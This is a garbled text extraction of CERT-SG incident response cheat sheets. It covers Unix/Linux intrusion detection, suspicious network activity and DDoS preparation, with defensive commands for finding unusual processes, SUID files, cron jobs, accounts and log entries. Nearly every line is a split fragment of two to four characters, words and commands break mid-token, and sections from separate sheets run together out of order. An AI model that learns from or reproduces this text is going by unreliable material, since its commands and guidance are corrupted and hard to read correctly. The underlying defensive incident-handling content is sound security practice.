the
usu
al s
ervi
ces
is n
eede
d. D
on’t
hesi
tate
to
ask
a U
nix/
Linu
x E
xper
t fo
r hi
s as
sist
ance
, w
hen
appl
icab
le.
■■
You
sho
uld
have
a r
egul
arly
upd
ated
list
of
all c
ritic
al fi
les,
(e
spec
ially
SU
ID a
nd G
UID
file
s) s
tore
d in
a s
ecur
e pl
ace
out o
f the
net
wor
k or
eve
n on
pap
er. W
ith th
is li
st, y
ou c
an
easi
ly s
epar
ate
usua
l SU
ID fi
les
and
dete
ct u
nusu
al o
nes.
■■
Hav
e a
map
of y
our
usua
l por
t act
ivity
/traf
fic r
ules
.
■■ L
ook
for
unus
ual f
iles
in /
proc
and
/tm
p. T
his
last
dire
ctor
y is
a p
lace
of
choi
ce f
or h
acke
rs t
o st
ore
data
or
mal
icio
us
bina
ries.
Un
usu
al S
ervi
ces
(Lin
ux o
nly)
Run
chk
conf
ig (
if in
stal
led)
to
chec
k fo
r al
l ena
bled
se
rvic
es:
# ch
kcon
fig -
-list
Lo
ok
at
the
runn
ing
proc
esse
s (r
emem
ber:
a
root
kit
mig
ht
chan
ge
your
re
sults
fo
r ev
eryt
hing
in
th
is
pape
r,
espe
cial
ly
here
!).
# ps
-au
x U
se ls
of –
p [p
id] o
n un
know
n pr
oces
ses
You
sho
uld
know
you
r us
ual r
unni
ng p
roce
sses
, an
d be
abl
e to
fig
ure
out
whi
ch p
roce
sses
cou
ld h
ave
been
add
ed b
y a
hack
er.
Pay
a s
peci
al a
ttent
ion
to th
e pr
oces
ses
runn
ing
unde
r U
ID 0
. U
nu
sual
Net
wo
rk A
ctiv
ity
Try
to d
etec
t sni
ffers
on
the
netw
ork
usin
g se
vera
l way
s:
Look
at
your
ker
nel l
og f
iles
for
inte
rfac
es e
nter
ing
prom
iscu
ous
mod
e su
ch a
s :“
kern
el: d
evic
e et
h0 e
nter
ed p
rom
iscu
ous
mod
e”
Use
# i
p lin
k to
det
ect
the
“PR
OM
ISC
” fla
g. P
refe
r th
is m
etho
d to
ifco
nfig
, sin
ce if
conf
ig d
oes
not w
ork
on a
ll ke
rnel
s.
■■ L
ook
for
unus
ual
port
act
ivity
: #
nets
tat
–nap
and
# l
sof
–i
to g
et m
ore
info
rmat
ion
abou
t pro
cess
es li
sten
ing
to p
orts
. ■■
Loo
k fo
r un
usua
l MA
C e
ntrie
s in
you
r LA
N:
# ar
p -a
■■
Loo
k fo
r an
y un
expe
cted
IP a
ddre
ss o
n th
e ne
twor
k.
Un
usu
al A
uto
mat
ed T
asks
■■ L
ook
for
unus
ual
jobs
sch
edul
ed b
y us
ers
men
tione
d in
/e
tc/c
ron.
allo
w.
Pay
a
spec
ial
atte
ntio
n to
th
e cr
on
jobs
sc
hedu
led
by U
ID 0
acc
ount
s (r
oot)
: #
cron
tab
–u r
oot -
l ■■
Loo
k fo
r un
usua
l sys
tem
-wid
e cr
on jo
bs:
# ca
t /e
tc/c
ront
ab
and
# ls
–la
/etc
/cro
n.*
Un
usu
al L
og
En
trie
s
Look
thr
ough
the
log
file
s on
the
sys
tem
for
sus
pici
ous
even
ts,
incl
udin
g th
e fo
llow
ing:
11
22
- H
uge
num
ber
of
auth
entic
atio
n/lo
gin
failu
res
from
lo
cal
or
rem
ote
acce
ss to
ols
(ssh
d,ftp
d,et
c.)
- R
emot
e P
roce
dure
Cal
l (R
PC
) pr
ogra
ms
with
a l
og e
ntry
tha
t in
clud
es a
larg
e nu
mbe
r of
str
ange
cha
ract
ers
…)
- A
hug
e nu
mbe
r of
Apa
che
logs
men
tioni
ng “
erro
r”
- R
eboo
ts (
Har
dwar
e re
boot
) -
Res
tart
of a
pplic
atio
ns (
Sof
twar
e re
boot
) A
lmos
t al
l lo
g fil
es a
re l
ocat
ed u
nder
/va
r/lo
g di
rect
ory
in m
ost
Linu
x di
strib
utio
ns. H
ere
are
the
mai
n on
es:
/var
/log
/mes
sag
e: G
ener
al m
essa
ge a
nd s
yste
m r
elat
ed s
tuff
/var
/log
/au
th.lo
g:
Aut
heni
catio
n lo
gs
/var
/log
/ker
n.lo
g: K
erne
l log
s /v
ar/lo
g/c
ron
.log
: Cro
nd lo
gs (
cron
job)
/v
ar/lo
g/m
aillo
g:
Mai
l ser
ver
logs
/v
ar/lo
g/h
ttp
d/:
Apa
che
acce
ss a
nd e
rror
logs
dire
ctor
y /v
ar/lo
g/b
oo
t.lo
g:
Sys
tem
boo
t log
/v
ar/lo
g/m
ysq
ld.lo
g:
MyS
QL
data
base
ser
ver
log
file
/var
/log
/sec
ure
: A
uthe
ntic
atio
n lo
g /v
ar/lo
g/u
tmp
or
/var
/log
/wtm
p:
Logi
n re
cord
s fil
e T
o lo
ok t
hrou
gh t
he l
og f
iles,
too
ls l
ike
cat
and
grep
may
be
usef
ul:
cat /
var/
log/
http
d/ac
cess
.log
| gre
p "G
ET
/sig
nup.
jsp"
Un
usu
al K
ern
el lo
g E
ntr
ies
■■
Look
th
roug
h th
e ke
rnel
lo
g fil
es
on
the
syst
em
for
susp
icio
us e
vent
s.
Use
: #
dmes
g Li
st a
ll im
port
ant k
erne
l and
sys
tem
info
rmat
ion
: #
lsm
od
# ls
pci
■■
Look
for
know
n ro
otki
t (us
e rk
hunt
er a
nd s
uch
tool
s)
File
has
hes
Ver
ify a
ll M
D5
hash
es o
f yo
ur b
inar
ies
in /
bin,
/sb
in,
/usr
/bin
, /u
sr/s
bin
or a
ny o
ther
rel
ated
bin
ary
stor
ing
plac
e. (
use
AID
E o
r su
ch to
ol)
W
AR
NIN
G:
this
op
erat
ion
will
pr
obab
ly
chan
ge
all
file
times
tam
ps.
Thi
s sh
ould
on
ly
be
done
af
ter
all
othe
r in
vest
igat
ions
are
don
e an
d yo
u fe
el l
ike
you
can
alte
r th
ese
data
. O
n sy
stem
s w
ith R
PM
inst
alle
d, u
se:
# rp
m –
Va
| sor
t O
n so
me
Linu
x, a
scr
ipt n
amed
che
ck-p
acka
ges
can
be u
sed.
O
n S
olar
is: #
pkg
_chk
–vn
O
n D
ebia
n: d
ebsu
ms
–ac
On
Ope
nbsd
(no
t rea
lly th
is b
ut a
way
): p
kg_d
elet
e -v
nx
22
Un
usu
al A
cco
un
ts
Look
for
any
sus
pici
ous
entr
y in
/et
c/pa
ssw
d, e
spec
ially
with
U
ID 0
. Als
o ch
eck
/etc
/gro
up a
nd /e
tc/s
hado
w.
Look
for
orp
hane
d fil
es,
whi
ch c
ould
hav
e be
en le
ft by
a d
elet
ed
acco
unt u
sed
in th
e at
tack
: #
find
/ \(
-nou
ser
–o –
nogr
oup
\) -
prin
t
Un
usu
al F
iles
■■
Look
for
all S
UID
and
GU
ID fi
les:
#
find
/ -ui
d 0
\( –
perm
-40
00 –
o –p
erm
200
0 \)
–pr
int
■■
Look
for
wei
rd fi
le n
ames
, sta
rtin
g w
ith “
. “ o
r “.
. “ o
r “
“ :
# fin
d / -
nam
e “
*“ –
prin
t #
find
/ -na
me
“. *
“ –p
rint
# fin
d / -
nam
e “.
. *“
–prin
t ■■
Lo
ok fo
r la
rge
files
(he
re: l
arge
r th
an 1
0MB
) #
find
/ -si
ze +
10M
B –
prin
t ■■
Lo
ok f
or p
roce
sses
run
ning
fro
m o
r to
file
s w
hich
hav
e be
en u
nlin
ked
: #
lsof
+L1
22
90104
Co
nta
inm
ent
Rec
ove
ry
Aft
erm
ath
In
cide
nt R
espo
nse
Met
hodo
logy
IRM
#3
Un
ix/L
inu
x In
tru
sio
n D
etec
tio
n
Live
Ana
lysi
s on
a s
uspe
cted
sys
tem
____
____
____
____
____
____
____
____
____
____
____
____
___
IRM
Aut
hor:
CE
RT
SG
/ C
edric
Per
net
IRM
ver
sion
: 1.3
E
-Mai
l: ce
rt.s
g@so
cgen
.com
W
eb: h
ttp://
cert
.soc
iete
gene
rale
.com
T
witt
er: @
Cer
tSG
Ab
stra
ct
Inci
den
t h
and
ling
ste
ps
Rem
edia
tio
n
■■ B
acku
p al
l im
port
ant
data
fro
m t
he c
ompr
omis
ed m
achi
ne,
if po
ssib
le u
sing
a b
it-by
-bit
phys
ical
cop
y of
the
who
le h
ard
disk
on
an
exte
rnal
sup
port
. A
lso
mak
e a
copy
of
the
mem
ory
(RA
M)
of th
e sy
stem
, whi
ch w
ill b
e in
vest
igat
ed if
nec
essa
ry.
If th
e m
achi
ne i
s no
t co
nsid
ered
crit
ical
for
the
com
pany
and
ca
n be
dis
conn
ecte
d, s
hut
the
mac
hine
dow
n th
e ha
rd w
ay,
rem
ovin
g its
pow
er p
lug.
If
it is
a l
apto
p w
ith a
bat
tery
on,
jus
t pu
sh
the
“off”
bu
tton
for
som
e se
cond
s un
til
the
com
pute
r sw
itche
s of
f. O
fflin
e in
vest
igat
ions
sh
ould
be
st
arte
d rig
ht
away
if
the
iden
tific
atio
n st
ep d
idn’
t gi
ve a
ny r
esul
t, bu
t th
e sy
stem
is
still
su
spec
ted
of b
eing
com
prom
ised
. T
ry t
o f
ind
evi
den
ces
of
ever
y ac
tio
n o
f th
e h
acke
r:
(usi
ng
fo
ren
sic
too
ls li
ke S
leu
th K
it/A
uto
psy
fo
r ex
amp
le)
■■
Fin
d a
ll fi
les
use
d b
y th
e at
tack
er, i
nclu
ding
del
eted
file
s an
d se
e w
hat
has
been
don
e w
ith t
hem
or
at l
east
the
ir fu
nctio
nalit
y to
eva
luat
e th
e th
reat
.
■■
Ch
eck
all f
iles
acce
ssed
rec
entl
y.
■■
Ch
eck
log
file
s.
■■
Mor
e ge
nera
lly,
try
to f
ind
ho
w t
he
atta
cker
go
t in
to t
he
syst
em.
All
lead
s sh
ould
be
cons
ider
ed.
If no
com
pute
r pr
oof
of t
he i
ntru
sion
is
foun
d, n
ever
for
get
it co
uld
com
e fr
om a
n in
side
r.
■■
App
ly f
ixes
whe
n ap
plic
able
, to
pre
vent
the
sam
e ki
nd o
f in
trus
ion,
in
ca
se
the
atta
cker
us
ed
a kn
own
fixed
vu
lner
abili
ty.
No
mat
ter
how
far
the
hac
ker
has
gone
into
the
sys
tem
and
the
kn
owle
dge
you
mig
ht h
ave
abou
t the
com
prom
issi
on, a
s lo
ng a
s th
e sy
stem
ha
s be
en
pene
trat
ed,
the
best
pr
actic
e is
to
re
inst
all
the
syst
em c
om
ple
tely
an
d a
pp
ly a
ll se
curi
ty f
ixes
. In
cas
e th
is s
olut
ion
can’
t be
appl
ied,
you
sho
uld:
■■
Cha
nge
all
the
syst
em’s
acc
ount
s pa
ssw
ords
, an
d m
ake
your
us
ers
do
so
in
a se
cure
w
ay:
they
sh
ould
us
e pa
ssw
ords
w
ith
uppe
r/lo
wer
ca
se,
spec
ial
char
acte
rs,
num
bers
, and
at l
east
be
7 ch
arac
ters
long
.
■■
Che
ck
the
inte
grity
of
th
e w
hole
da
ta
stor
ed
on
the
syst
em, u
sing
MD
5 ha
shes
.
■■
Res
tore
al
l bi
narie
s w
hich
co
uld
have
be
en
chan
ged
(Exa
mpl
e: /b
in/s
u)
Rep
ort
A
cris
is r
epor
t sh
ould
be
writ
ten
and
mad
e av
aila
ble
to a
ll of
the
ac
tors
of
th
e cr
isis
m
anag
emen
t ce
ll.
The
fo
llow
ing
them
es
shou
ld b
e de
scrib
ed:
■■
Initi
al d
etec
tion
■■
Act
ions
and
tim
elin
es
■■
Wha
t wen
t rig
ht
■■
Wha
t wen
t wro
ng
■■
Inci
dent
cos
t C
apit
aliz
e
Act
ions
to
im
prov
e th
e
Uni
x/Li
nux
intr
usio
n de
tect
ion
man
agem
ent
proc
esse
s sh
ould
be
defin
ed t
o ca
pita
lize
on t
his
expe
rienc
e.
Thi
s In
cide
nt R
espo
nse
Met
hodo
logy
is a
che
at s
heet
ded
icat
ed
to in
cide
nt h
andl
ers
inve
stig
atin
g a
prec
ise
secu
rity
issu
e.
Who
sho
uld
use
IRM
she
ets?
•
Adm
inis
trat
ors
• S
ecur
ity O
pera
tion
Cen
ter
•
CIS
Os
and
depu
ties
• C
ER
Ts
(Com
pute
r E
mer
genc
y R
espo
nse
Tea
m)
Rem
emb
er:
If y
ou
fac
e an
in
cid
ent,
fo
llow
IR
M,
take
no
tes
and
d
o
no
t p
anic
. C
on
tact
yo
ur
CE
RT
im
med
iate
ly
if
nee
ded
.
6 st
eps
are
defin
ed to
han
dle
secu
rity
Inci
dent
s
� � �� P
rep
arat
ion
: g
et r
ead
y to
han
dle
th
e in
cid
ent
� ��� Id
enti
fica
tio
n:
det
ect
the
inci
den
t � ���
Co
nta
inm
ent:
lim
it t
he
imp
act
of
the
inci
den
t � � ��
Rem
edia
tio
n:
rem
ove
th
e th
reat
� ���
Rec
ove
ry:
reco
ver
to a
no
rmal
sta
ge
� ���
Aft
erm
ath
: d
raw
up
an
d im
pro
ve t
he
pro
cess
IRM
pro
vid
es d
etai
led
info
rmat
ion
fo
r ea
ch s
tep
.
T
his
docu
men
t is
for
publ
ic u
se
33
55 66
Tem
pora
ry r
emov
e al
l acc
esse
s to
the
acc
ount
s in
volv
ed in
the
in
cide
nt, a
nd r
emov
e al
l fra
udul
ent f
iles.
44
91105
Pr
epar
atio
n Id
entif
icat
ion
Con
tain
men
t
Obj
ectiv
e: E
stab
lish
cont
acts
, def
ine
proc
edur
es,
gath
er in
form
atio
n an
d ge
t fam
iliar
with
intr
usio
n de
tect
ion
tool
s to
sav
e tim
e du
ring
an a
ttack
. In
trus
ion
Det
ectio
n Sy
stem
s
Ens
ure
that
the
mon
itorin
g to
ols
are
up to
dat
e;
Est
ablis
h co
ntac
ts w
ith y
our
netw
ork
and
secu
rity
oper
atio
n te
ams;
Mak
e su
re t
hat
an a
lert
notif
icat
ion
proc
ess
is
defin
ed a
nd w
ell-k
now
n fro
m e
very
one.
Net
wor
k
Mak
e su
re
that
an
in
vent
ory
of
the
netw
ork
acce
ss p
oint
s is
ava
ilabl
e an
d up
-to-d
ate;
Mak
e su
re t
hat
netw
ork
team
s ha
ve u
p to
dat
e ne
twor
k m
aps
and
conf
igur
atio
ns;
Loo
k fo
r po
tent
ial
unw
ante
d ne
twor
k ac
cess
po
ints
(xD
SL,
Wifi
, M
odem
, …
) re
gula
rly a
nd c
lose
th
em;
Ens
ure
that
tra
ffic
man
agem
ent
tool
s an
d pr
oces
ses
are
oper
atio
nal.
Bas
elin
e tr
affic
Ide
ntify
the
base
line
traffi
c an
d flo
ws;
Ide
ntify
the
busi
ness
-crit
ical
flow
s.
Obj
ectiv
e: D
etec
t th
e in
cide
nt,
dete
rmin
e its
sc
ope,
and
invo
lve
the
appr
opria
te p
artie
s.
Sour
ces
of d
etec
tion:
N
otifi
catio
n by
use
r/hel
pdes
k;
ID
S a
lert;
Det
ectio
n by
net
wor
k st
aff;
Com
plai
n fro
m a
n ex
tern
al s
ourc
e.
Rec
ord
susp
ect n
etw
ork
activ
ity
Net
wor
k fra
mes
can
be
stor
ed in
to a
file
and
tran
smitt
ed
to y
our i
ncid
ent r
espo
nse
team
for f
urth
er a
naly
sis.
U
se n
etw
ork
capt
ure
tool
s (ts
hark
, win
dum
p, tc
pdum
p…)
to d
ump
mal
icio
us tr
affic
. Use
a h
ub o
r po
rt m
irror
ing
on
an a
ffect
ed L
AN
to c
olle
ct v
alua
ble
data
. N
etw
ork
fore
nsic
requ
ires
skill
s an
d kn
owle
dge
. Ask
yo
ur
inci
dent
re
spon
se
team
fo
r as
sist
ance
or
ad
vice
s.
Ana
lyze
the
atta
ck
Ana
lyze
ale
rts g
ener
ated
by
your
IDS
;
Rev
iew
sta
tistic
s an
d lo
gs o
f net
wor
k de
vice
s;
Try
to u
nder
stan
d th
e go
al o
f the
mal
icio
us tr
affic
and
id
entif
y th
e in
frast
ruct
ure
com
pone
nts
affe
cted
by
it;
Ide
ntify
the
tech
nica
l cha
ract
eris
tics
of th
e tra
ffic:
-
Sou
rce
IP a
ddre
ss(e
s)
- P
orts
use
d, T
TL, P
acke
t ID
, …
- P
roto
cols
use
d -
Targ
eted
mac
hine
s/se
rvic
es
- E
xplo
it(s)
-
Rem
ote
acco
unts
logg
ed in
A
t th
e en
d of
thi
s st
ep, t
he im
pact
ed m
achi
nes
and
the
mod
us o
pera
ndi
of t
he a
ttack
sho
uld
have
bee
n id
entif
ied.
Idea
lly, t
he s
ourc
e of
the
at
tack
sho
uld
have
bee
n id
entif
ied
as w
ell.
This
is
w
here
yo
u sh
ould
do
yo
ur
fore
nsic
in
vest
igat
ions
, if n
eede
d.
If a
com
prom
ised
com
pute
r has
bee
n id
entif
ied,
ch
eck
IRM
che
at s
heet
s de
dica
ted
to in
trus
ion.
Obj
ectiv
e: M
itiga
te t
he a
ttack
effe
cts
on t
he
neig
hbou
ring
IT re
sour
ces.
If
the
issu
e is
co
nsid
ered
as
st
rate
gic
(sen
sitiv
e re
sour
ces
acce
ss),
a sp
ecifi
c cr
isis
man
agem
ent
cell
shou
ld b
e ac
tivat
ed.
Dep
endi
ng o
n th
e cr
itica
lity
of t
he i
mpa
cted
res
ourc
es,
the
follo
win
g st
eps
can
be p
erfo
rmed
and
mon
itore
d :
D
isco
nnec
t the
com
prom
ised
are
a fro
m th
e ne
twor
k.
Iso
late
th
e so
urce
of
th
e at
tack
. D
isco
nnec
t th
e af
fect
ed
com
pute
r(s)
in
orde
r to
pe
rform
fu
rther
in
vest
igat
ion.
Fin
d ac
cept
able
m
itiga
tion
mea
sure
s fo
r th
e bu
sine
ss-c
ritic
al t
raffi
c in
agr
eem
ent
with
the
bus
ines
s lin
e m
anag
ers.
Ter
min
ate
unw
ante
d co
nnec
tions
or
proc
esse
s on
af
fect
ed m
achi
nes.
Use
fire
wal
l/IP
S ru
les
to b
lock
the
atta
ck.
Use
IDS
rule
s to
mat
ch w
ith th
is m
alic
ious
beh
avio
ur
and
info
rm te
chni
cal s
taff
on n
ew e
vent
s.
App
ly a
d ho
c ac
tions
in c
ase
of s
trate
gic
issu
e:
- B
lock
exf
iltra
tion
dest
inat
ion
or re
mot
e lo
catio
n on
Inte
rnet
filte
rs ;
- R
estri
ct s
trate
gic
file
serv
ers
to re
ject
co
nnec
tions
from
the
com
prom
ised
com
pute
r; -
Sel
ect w
hat k
ind
of fi
les
can
be lo
st /
stol
en
and
rest
rict t
he a
cces
s fo
r con
fiden
tial f
iles;
-
Cre
ate
fake
doc
umen
ts w
ith w
ater
mar
king
th
at c
ould
be
use
as a
pro
of o
f the
ft;
- N
otify
targ
eted
bus
ines
s us
ers
abou
t wha
t m
ust b
e do
ne a
nd w
hat i
s fo
rbid
den;
-
Con
figur
e lo
ggin
g ca
pabi
litie
s in
ver
bose
m
ode
on ta
rget
ed e
nviro
nmen
t and
sto
re th
em
in a
rem
ote
secu
re s
erve
r.
33 22
11
92106
Inci
dent
Res
pons
e M
etho
dolo
gy
IRM
#5
M
alic
ious
net
wor
k be
havi
our
Gui
delin
es to
han
dle
a su
spic
ious
net
wor
k ac
tivity
__
____
____
____
____
____
____
____
____
____
____
____
____
_ A
utho
r: C
ER
T-S
G /
Dav
id B
izeu
l & V
ince
nt F
erra
n-La
com
e IR
M v
ersi
on: 1
.3
E-M
ail:
cert.
sg@
socg
en.c
om
Web
: http
://ce
rt.so
ciet
egen
eral
e.co
m
Twitt
er: @
Cer
tSG
Abs
trac
t
Inci
dent
han
dlin
g st
eps
Rem
edia
tion
Rec
over
y
Afte
rmat
h
This
Inci
dent
Res
pons
e M
etho
dolo
gy is
a c
heat
she
et d
edic
ated
to
han
dler
s in
vest
igat
ing
on a
pre
cise
sec
urity
issu
e.
Who
sho
uld
use
IRM
she
ets?
•
Adm
inis
trato
rs
• S
ecur
ity O
pera
tion
Cen
ter
• C
ISO
s an
d de
putie
s •
CE
RTs
(Com
pute
r Em
erge
ncy
Res
pons
e Te
am)
IRM
can
be
shar
ed w
ith a
ll S
G s
taff.
R
emem
ber:
If y
ou f
ace
an in
cide
nt, f
ollo
w IR
M, t
ake
note
s an
d do
no
t pa
nic.
C
onta
ct
your
C
ERT
imm
edia
tely
if
need
ed.
6 st
eps
are
defin
ed to
han
dle
secu
rity
Inci
dent
s
P
repa
ratio
n: g
et re
ady
to h
andl
e th
e in
cide
nt
Iden
tific
atio
n: d
etec
t the
inci
dent
C
onta
inm
ent:
limit
the
impa
ct o
f the
inci
dent
R
emed
iatio
n: re
mov
e th
e th
reat
R
ecov
ery:
reco
ver t
o a
norm
al s
tage
A
fterm
ath:
dra
w u
p an
d im
prov
e th
e pr
oces
s
IRM
pro
vide
s de
taile
d in
form
atio
n fo
r eac
h st
ep.
Th
is d
ocum
ent i
s fo
r pub
lic u
se
Obj
ectiv
e: T
ake
actio
ns t
o st
op t
he m
alic
ious
be
havi
our.
Blo
ck th
e so
urce
U
sing
ana
lysi
s fro
m p
revi
ous
step
s id
entif
icat
ion
and
cont
ainm
ent,
find
out
all
com
mun
icat
ion
chan
nels
use
d by
the
atta
cker
and
blo
ck t
hem
on
all
your
net
wor
k bo
unda
ries.
If
the
sour
ce h
as b
een
iden
tifie
d as
an
insi
der,
take
ap
prop
riate
act
ions
and
invo
lve
your
man
agem
ent a
nd/o
r H
R te
am a
nd/o
r leg
al te
am.
If
the
sour
ce h
as b
een
iden
tifie
d as
an
exte
rnal
of
fend
er,
cons
ider
in
volv
ing
abus
e te
ams
and
law
en
forc
emen
t ser
vice
s if
requ
ired.
Tech
nica
l rem
edia
tion
Def
ine
a re
med
iatio
n pr
oces
s.
If ne
cess
ary,
th
is
proc
ess
can
be v
alid
ated
by
anot
her
stru
ctur
e, li
ke y
our
inci
dent
resp
onse
team
for e
xam
ple.
Rem
edia
tion
step
s fro
m i
ntru
sion
IR
M c
an a
lso
be
usef
ul.
Test
and
enf
orce
Tes
t th
e re
med
iatio
n pr
oces
s an
d m
ake
sure
tha
t it
prop
erly
wor
ks w
ithou
t dam
agin
g an
y se
rvic
e.
Enf
orce
the
rem
edia
tion
proc
ess
once
tes
ts h
ave
been
app
rove
d by
bot
h IT
and
bus
ines
s.
44 O
bjec
tive:
R
esto
re
the
syst
em
to
norm
al
oper
atio
ns.
11 ..
Ensu
re t
hat
the
netw
ork
traffi
c is
bac
k to
no
rmal
22 ..
R
e-al
low
the
net
wor
k tra
ffic
that
was
use
d as
a p
ropa
gatio
n m
etho
d by
the
atta
cker
33 ..
R
econ
nect
sub
-are
as to
geth
er if
nec
essa
ry
44 ..
Rec
onne
ct th
e ar
ea to
you
r loc
al n
etw
ork
if ne
cess
ary
55 ..
Rec
onne
ct
the
area
to
th
e In
tern
et
if ne
cess
ary
All
of t
hese
ste
ps s
hall
be m
ade
in a
ste
p-by
-ste
p m
anne
r and
with
a te
chni
cal m
onito
ring.
55 66 O
bjec
tive:
D
ocum
ent
the
inci
dent
’s
deta
ils,
reta
il co
llect
ed
data
, an
d id
entif
y th
e im
prov
emen
ts.
Rep
ort
A re
port
shou
ld b
e w
ritte
n an
d m
ade
avai
labl
e to
all
of th
e ac
tors
. Th
e fo
llow
ing
them
es s
houl
d be
des
crib
ed:
- In
itial
cau
se o
f the
issu
e -
Act
ions
and
tim
elin
es
- W
hat w
ent r
ight
-
Wha
t wen
t wro
ng
- In
cide
nt c
ost
Cap
italiz
e
Act
ions
to
im
prov
e th
e ne
twor
k in
trusi
on
man
agem
ent
proc
esse
s sh
ould
be
de
fined
to
ca
pita
lize
on th
is e
xper
ienc
e.
93107
Prep
arat
ion
Iden
tific
atio
n C
onta
inm
ent
Obj
ectiv
e: E
stab
lish
cont
acts
, def
ine
proc
edur
es,
and
gath
er i
nfor
mat
ion
to s
ave
time
durin
g an
at
tack
. In
tern
et S
ervi
ce P
rovi
der s
uppo
rt
Con
tact
you
r IS
P to
und
erst
and
the
DD
oS m
itiga
tion
serv
ices
it
offe
rs (f
ree
and
paid
) and
wha
t pro
cess
you
sho
uld
follo
w.
If po
ssib
le, s
ubsc
ribe
to a
redu
ndan
t Int
erne
t con
nect
ion.
Est
ablis
h co
ntac
ts w
ith y
our I
SP
and
law
enf
orce
men
t ent
ities
. M
ake
sure
tha
t yo
u ha
ve t
he p
ossi
bilit
y to
use
an
out-o
f-ban
d co
mm
unic
atio
n ch
anne
l (e.
g.: p
hone
).
Inve
ntor
y
C
reat
e a
whi
telis
t of t
he IP
add
ress
es a
nd p
roto
cols
you
mus
t al
low
if p
riorit
izin
g tra
ffic
durin
g an
atta
ck.
Don
’t fo
rget
to
incl
ude
your
crit
ical
cus
tom
ers,
key
par
tner
s, e
tc.
Doc
umen
t yo
ur I
T in
frast
ruct
ure
deta
ils,
incl
udin
g bu
sine
ss
owne
rs,
IP a
ddre
sses
and
circ
uit
IDs,
rou
ting
setti
ngs
(AS
, et
c);
prep
are
a ne
twor
k to
polo
gy d
iagr
am a
nd a
n as
set i
nven
tory
.
Net
wor
k in
fras
truc
ture
D
esig
n a
good
net
wor
k in
frast
ruct
ure
with
out
Sin
gle
Poi
nt o
f Fa
ilure
or b
ottle
neck
.
Dis
tribu
te y
our D
NS
ser
vers
and
oth
er c
ritic
al s
ervi
ces
(SM
TP,
etc)
thr
ough
diff
eren
t AS
.
Har
den
the
conf
igur
atio
n of
ne
twor
k,
OS
, an
d ap
plic
atio
n co
mpo
nent
s th
at m
ay b
e ta
rget
ed b
y D
DoS
.
Bas
elin
e yo
ur c
urre
nt in
frast
ruct
ure’
s pe
rform
ance
, so
you
can
iden
tify
the
atta
ck fa
ster
and
mor
e ac
cura
tely
.
If yo
ur b
usin
ess
is I
nter
net
depe
nden
t, co
nsid
er p
urch
asin
g sp
ecia
lized
DD
oS m
itiga
tion
prod
ucts
or s
ervi
ces.
Con
firm
DN
S t
ime-
to-li
ve (
TTL)
set
tings
for
the
sys
tem
s th
at
mig
ht b
e at
tack
ed. L
ower
the
TTLs
, if n
eces
sary
, to
faci
litat
e D
NS
re
dire
ctio
n if
the
orig
inal
IP a
ddre
sses
get
atta
cked
. 600
is a
goo
d TT
L va
lue.
Dep
endi
ng o
f th
e cr
itica
lity
of y
our
serv
ices
, co
nsid
er s
ettin
g-up
a b
acku
p th
at y
ou c
an s
witc
h on
in c
ase
of is
sue.
Inte
rnal
con
tact
s
E
stab
lish
cont
acts
for y
our I
DS
, fire
wal
l, sy
stem
s, a
nd n
etw
ork
team
s.
Col
labo
rate
with
the
bus
ines
s lin
es t
o un
ders
tand
bus
ines
s im
plic
atio
ns (e
.g.,
mon
ey lo
ss) o
f lik
ely
DD
oS a
ttack
sce
nario
s.
Invo
lve
your
BC
P/D
R p
lann
ing
team
on
DD
oS in
cide
nts.
The
“pre
para
tion”
pha
se i
s to
be
cons
ider
ed a
s th
e m
ost
impo
rtan
t ele
men
t of a
suc
cess
ful D
DoS
inci
dent
resp
onse
.
Obj
ectiv
e: D
etec
t th
e in
cide
nt,
dete
rmin
e its
sc
ope,
and
invo
lve
the
appr
opria
te p
artie
s.
Ana
lyze
the
atta
ck
Und
erst
and
the
logi
cal f
low
of t
he D
DoS
atta
ck a
nd id
entif
y th
e in
frast
ruct
ure
com
pone
nts
affe
cted
by
it.
Und
erst
and
if yo
u ar
e th
e ta
rget
of t
he a
ttack
or
a co
llate
ral
vict
im
Rev
iew
the
load
and
log
files
of
serv
ers,
rou
ters
, fir
ewal
ls,
appl
icat
ions
, and
oth
er a
ffect
ed in
frast
ruct
ure.
Iden
tify
wha
t asp
ects
of t
he D
DoS
traf
fic d
iffer
entia
te it
from
be
nign
traf
fic
- S
ourc
e IP
add
ress
es, A
S, e
tc
- D
estin
atio
n po
rts
- U
RLs
-
Pro
toco
ls fl
ags
Net
wor
k an
alys
is to
ols
can
be u
sed
to re
view
the
traffi
c
Tcpd
ump,
Tsh
ark,
Sno
rt, A
rgus
, Nto
p, A
guri,
MR
TG
If po
ssib
le, c
reat
e a
NID
S s
igna
ture
to fo
cus
to d
iffer
entia
te
betw
een
beni
gn a
nd m
alic
ious
traf
fic.
Invo
lve
inte
rnal
and
ext
erna
l act
ors
Con
tact
you
r int
erna
l tea
ms
to le
arn
abou
t the
ir vi
sibi
lity
into
th
e at
tack
.
Con
tact
you
r IS
P to
ask
for h
elp.
Be
spec
ific
abou
t the
traf
fic
you’
d lik
e to
con
trol:
- N
etw
ork
bloc
ks in
volv
ed
- S
ourc
e IP
add
ress
es
- P
roto
cols
Not
ify y
our c
ompa
ny’s
exe
cutiv
e an
d le
gal t
eam
s.
Che
ck th
e ba
ckgr
ound
Fi
nd
out
whe
ther
th
e co
mpa
ny
rece
ived
an
ex
torti
on
dem
and
as a
pre
curs
or to
the
atta
ck.
Sea
rch
if an
yone
wou
ld h
ave
any
inte
rest
into
thr
eate
ning
yo
ur c
ompa
ny
- C
ompe
titor
s -
Ideo
logi
cally
-mot
ivat
ed g
roup
s (h
ackt
ivis
ts)
- Fo
rmer
em
ploy
ees
Obj
ectiv
e: M
itiga
te t
he a
ttack
’s e
ffect
s on
the
ta
rget
ed e
nviro
nmen
t.
If
the
bottl
enec
k is
a p
artic
ular
fea
ture
of
an a
pplic
atio
n,
tem
pora
rily
disa
ble
that
feat
ure.
Atte
mpt
to
thro
ttle
or b
lock
DD
oS t
raffi
c as
clo
se t
o th
e ne
twor
k’s
“clo
ud”
as
poss
ible
vi
a a
rout
er,
firew
all,
load
ba
lanc
er, s
peci
aliz
ed d
evic
e, e
tc.
Term
inat
e un
wan
ted
conn
ectio
ns o
r pr
oces
ses
on s
erve
rs
and
rout
ers
and
tune
thei
r TC
P/IP
set
tings
.
If po
ssib
le, s
witc
h to
alte
rnat
e si
tes
or n
etw
orks
usi
ng D
NS
or
ano
ther
mec
hani
sm.
Bla
ckho
le D
DoS
tra
ffic
targ
etin
g th
e or
igin
al IP
add
ress
es.
Set
up
an a
ltern
ate
com
mun
icat
ion
chan
nel
betw
een
you
and
your
use
rs/c
usto
mer
s (e
.g.:
web
ser
ver,
mai
l ser
ver,
voic
e se
